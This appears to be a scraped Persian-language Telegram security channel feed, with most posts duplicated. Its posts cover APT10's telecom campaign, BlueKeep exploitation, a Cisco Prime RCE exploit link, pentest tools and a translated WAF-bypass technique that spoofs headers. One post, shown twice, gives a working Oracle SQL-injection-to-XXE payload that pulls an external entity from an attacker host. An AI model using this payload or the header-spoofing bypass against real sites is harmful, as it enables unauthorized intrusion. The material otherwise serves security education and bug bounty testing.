محققان Cybereason کمپینی را شناسایی کردند که شرکتهای ارائه دهنده خدمات مخابراتی بزرگ را هدف قرار داده است.
این کمپین توسط گروه هکرهای چینی با کد شناسایی APT10 صورت گرفته و یک حمله ی چند جانبه است.
این حملات از سال ۲۰۱۲ در جریان بوده و با نام Operation Soft Cell شناخته میشود. به نظر میرسد عاملان این حمله به دنبال جزییات تماس های افراد در این زیرساختهای مخابراتی بوده اند.
هکرهای مذکور در هر موج از حمله پس از شناسایی شدن پس از چند ماه اقدام به حمله ی جدید با استفاده از ابزارها و روشهای نوین میکردند.
جزییات بیشتر و شرح فنی این حملات:
https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers
#news
#apt10
#telecom
@sec_nerd
این کمپین توسط گروه هکرهای چینی با کد شناسایی APT10 صورت گرفته و یک حمله ی چند جانبه است.
این حملات از سال ۲۰۱۲ در جریان بوده و با نام Operation Soft Cell شناخته میشود. به نظر میرسد عاملان این حمله به دنبال جزییات تماس های افراد در این زیرساختهای مخابراتی بوده اند.
هکرهای مذکور در هر موج از حمله پس از شناسایی شدن پس از چند ماه اقدام به حمله ی جدید با استفاده از ابزارها و روشهای نوین میکردند.
جزییات بیشتر و شرح فنی این حملات:
https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers
#news
#apt10
#telecom
@sec_nerd
Cybereason
Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers
In 2018, the Cybereason Nocturnus team identified Operation Soft Cell, an advanced, persistent attack targeting global telecommunications providers.
مجموعه ماشین های مجازی برای تقویت قابلیت های تست نفوذ به وب
https://pastebin.com/dmqmBTwz
#web
#pentest
#lab
@sec_nerd
https://pastebin.com/dmqmBTwz
#web
#pentest
#lab
@sec_nerd
تبدیل SQLi به XXE با استفاده از تابع xmltype
id=1'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % evil SYSTEM "https://haxor.com ">%evil;]>'),'/l') from dual)||'
(قبلا به اشتباه xss تایپ شده بود که اصلاح شد)
#sqli
#xxe
#web
#bugbounty
#pentest
@sec_nerd
id=1'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % evil SYSTEM "https://haxor.com ">%evil;]>'),'/l') from dual)||'
(قبلا به اشتباه xss تایپ شده بود که اصلاح شد)
#sqli
#xxe
#web
#bugbounty
#pentest
@sec_nerd
ابزار Osmedeus برای شناسایی و کشف آسیب پذیری بر روی تارگت ها
https://github.com/j3ssie/Osmedeus
#tool
#pentest
#web
@sec_nerd
https://github.com/j3ssie/Osmedeus
#tool
#pentest
#web
@sec_nerd
امنیت اطلاعات
تیم rapid7 ماژول متاسپلویت مربوط به باگ معروف به Bluekeep که با شناسه ی CVE-2019-0708 ثبت شده است را منتشر کرد. https://github.com/rapid7/metasploit-framework/pull/12283 این آسیب پذیری در ویندوزهای ویستا، هفت، ایکس پی، سرور ۲۰۰۳ و ۲۰۰۸ و در سرویس RDP به…
هکرها در حال استفاده وسیع از آسیب پذیری Bluekeep برای انتشار بدافزار استخراج کننده ارز دیجیتال هستند.
اکسپلویت مذکور توسط شرکتهای بزرگ با موفقیت ایجاد و آزمایش شده اما هنوز بصورت عمومی منتشر نشده است زیرا نزدیک به یک میلیون سیستم آسیب پذیر در برابر این حمله وجود دارد.
با وجود اینکه این آسیب پذیری قابلیت worm سازی را دارد اما اکسپلویت مورد بحث و مورد استفاده در استخراج ارز دیجیتال از نوع worm نیست.
اطلاعات بیشتر:
https://thehackernews.com/2019/11/bluekeep-rdp-vulnerability.html
#new
#bluekeep
#windows
#malware
@sec_nerd
اکسپلویت مذکور توسط شرکتهای بزرگ با موفقیت ایجاد و آزمایش شده اما هنوز بصورت عمومی منتشر نشده است زیرا نزدیک به یک میلیون سیستم آسیب پذیر در برابر این حمله وجود دارد.
با وجود اینکه این آسیب پذیری قابلیت worm سازی را دارد اما اکسپلویت مورد بحث و مورد استفاده در استخراج ارز دیجیتال از نوع worm نیست.
اطلاعات بیشتر:
https://thehackernews.com/2019/11/bluekeep-rdp-vulnerability.html
#new
#bluekeep
#windows
#malware
@sec_nerd
آسیب پذیری اجرای دستور از راه دور بر روی Cisco Prime Infrastructure بدون نیاز به احراز هویت
توضیحات:
https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html
اکسپلویت:
https://srcincite.io/pocs/src-2019-0034.py.txt
#network
#cisco
#pentest
@sec_nerd
توضیحات:
https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html
اکسپلویت:
https://srcincite.io/pocs/src-2019-0034.py.txt
#network
#cisco
#pentest
@sec_nerd
Forwarded from امنیت اطلاعات
XSS To Good XSS With ClickJacking on Subdomain Microsoft
https://link.medium.com/4EXo7G8Sk1
#XSS
#web
#BugBounty
@sec_nerd
https://link.medium.com/4EXo7G8Sk1
#XSS
#web
#BugBounty
@sec_nerd
Medium
XSS To Good XSS With ClickJacking on Subdomain Microsoft
Bismillah hirrahman nirrahim.
گوگل سعی دارد خود را به نقطه دستیابی به تمام محتوای وب تبدیل کند. این عمل با سه گامی که شرکت گوگل برداشته است انجام شده:
۱- حذف آدرس های قابل دیدن در کروم با استفاده از origin chip
۲- جریمه وبسایتهایی که از قابلیت google AMP استفاده نمیکنند (گوگل AMP سرویس گوگل برای ساخت و نمایش صفحات وب با سرعت بالا و هماهنگ با دستگاه های مختلف است)
۳- حذف آدرس های وبسایتها از نتایج جستجوی گوگل
https://twitter.com/drybones_5/status/1190694123965210625
#news
#google
@sec_nerd
۱- حذف آدرس های قابل دیدن در کروم با استفاده از origin chip
۲- جریمه وبسایتهایی که از قابلیت google AMP استفاده نمیکنند (گوگل AMP سرویس گوگل برای ساخت و نمایش صفحات وب با سرعت بالا و هماهنگ با دستگاه های مختلف است)
۳- حذف آدرس های وبسایتها از نتایج جستجوی گوگل
https://twitter.com/drybones_5/status/1190694123965210625
#news
@sec_nerd
Hubspot
Google AMP Helps You Make Stunning Web Experiences. Here's How.
Google AMP is open-source software that helps you make incredible web experiences for customers. Learn how in this post.
بایپس کردن WAF با استفاده از هدر های http
محقق امنیت Jason Haddix بعد از تحقیقات زیاد و سرکله زدن با فایروال ها فهمیده که فایروال های وب معمولا از 4 حالت برای محافظت از وبسایت حملات رو تشخیص میدن
1 : فایروال ابتدا هدر X-originating-IP شخص فرستنده ی درخواست رو بررسی میکنه. درصورتی که ایپی درخواست 127.0.0.1 باشه فایروال فکر میکنه که درخواست از طرف خودش هست و کاری به کار هکر نداره
2 : بعد از تحقیقات بیشتر فهمید که بعضی هدر ها وجود دارند که WhiteList های اکثر فایروال ها محسوب میشوند که اسامی این هدر ها به صورت زیر است :
X-forwarded-for
X-remote-IP
X-originating-IP
x-remote-addr
3 : در روش سوم نیز ما یک پروکسی interception برای مرورگرمون تنظیم میکنیم ( Burp Suite ) و لیست هدر هایی که توسط فایروال بلک لیست نشده و به عنوان هدر مورد قبول در یک درخواست ارسال میشن رو میشه تست کرد و برداشت و اینگونه فایروال رو بایپس کرد . یک ابزار خاصی هم برای پیدا کردن انواع هدر های http یک سایت به نام GetHead وجود دارد که این کار را آسان میکند .
همچنین یک extenstion یا پلاگین در این راستا برای ابزار Burp Suite نیز طراحی شده که میتوانید از اینجا تهیه نمایید .
مترجم : ارسلان قربانزاده
#WAF
#bypass
#burpsuite
@sec_nerd
محقق امنیت Jason Haddix بعد از تحقیقات زیاد و سرکله زدن با فایروال ها فهمیده که فایروال های وب معمولا از 4 حالت برای محافظت از وبسایت حملات رو تشخیص میدن
1 ) درخواست و پاسخ سریع با استفاده از متود post به فرم ها
2 ) درخواست و پاسخ سریع با استفاده از متود get به بسیاری از صفحات سایت
3 ) فقدان یا عدم مطابقت توکن CSRF
4 ) کاراکتر های بد که برای نفود از آنها استفاده میشود
این محقق با مطالعات بیشتر متوجه شده است که همچنین فایروال ها در اغاز یک درخواست ، اولین کار هایی که میکنند به سه مرحله تقسیم میشود : 1 : فایروال ابتدا هدر X-originating-IP شخص فرستنده ی درخواست رو بررسی میکنه. درصورتی که ایپی درخواست 127.0.0.1 باشه فایروال فکر میکنه که درخواست از طرف خودش هست و کاری به کار هکر نداره
2 : بعد از تحقیقات بیشتر فهمید که بعضی هدر ها وجود دارند که WhiteList های اکثر فایروال ها محسوب میشوند که اسامی این هدر ها به صورت زیر است :
X-forwarded-for
X-remote-IP
X-originating-IP
x-remote-addr
3 : در روش سوم نیز ما یک پروکسی interception برای مرورگرمون تنظیم میکنیم ( Burp Suite ) و لیست هدر هایی که توسط فایروال بلک لیست نشده و به عنوان هدر مورد قبول در یک درخواست ارسال میشن رو میشه تست کرد و برداشت و اینگونه فایروال رو بایپس کرد . یک ابزار خاصی هم برای پیدا کردن انواع هدر های http یک سایت به نام GetHead وجود دارد که این کار را آسان میکند .
همچنین یک extenstion یا پلاگین در این راستا برای ابزار Burp Suite نیز طراحی شده که میتوانید از اینجا تهیه نمایید .
مترجم : ارسلان قربانزاده
#WAF
#bypass
#burpsuite
@sec_nerd
GitHub
GitHub - codewatchorg/bypasswaf: Add headers to all Burp requests to bypass some WAF products
Add headers to all Burp requests to bypass some WAF products - codewatchorg/bypasswaf
آزمون آسیب پذیری SQL injection از نوع Time based با استفاده از امکان repeater در burpsuite
#burpsuite
#sqli
#pentest
@sec_nerd
#burpsuite
#sqli
#pentest
@sec_nerd